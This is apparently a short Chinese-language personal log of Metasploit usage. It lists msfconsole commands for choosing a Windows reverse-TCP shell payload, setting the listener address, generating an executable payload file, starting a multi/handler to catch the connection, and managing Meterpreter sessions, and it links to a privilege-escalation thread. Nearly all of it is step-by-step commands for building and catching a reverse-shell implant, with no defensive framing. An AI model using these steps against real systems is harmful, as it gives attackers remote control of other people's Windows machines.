msf 使用记录

1. msfconsole

2. show payloads 

3. use windows/shell/reverse_tcp

4. show options

5. set LHOST 192.168.x.x

6. generate -h

7. generate -f r_tcp.exe -t exe

8. use exploit/multi/handler

9. use  windows/shell/reverse_tcp   (2) windows/meterpreter_reverse_tcp

10. show options 

11. set LHOST 192.168.x.x

12. exploit 

Meterprefer 使用 

1. background 挂入后台session

2. sessions 查看现有的后台  session

3. sessions -i 1 查看后台session id为1

[原创]Meterpreter综合提权 heatlevel

 https://bbs.ichunqiu.com/thread-17990-1-1.html?from=bbsrt1

原文地址:https://www.cnblogs.com/M4ster/p/msf_re.html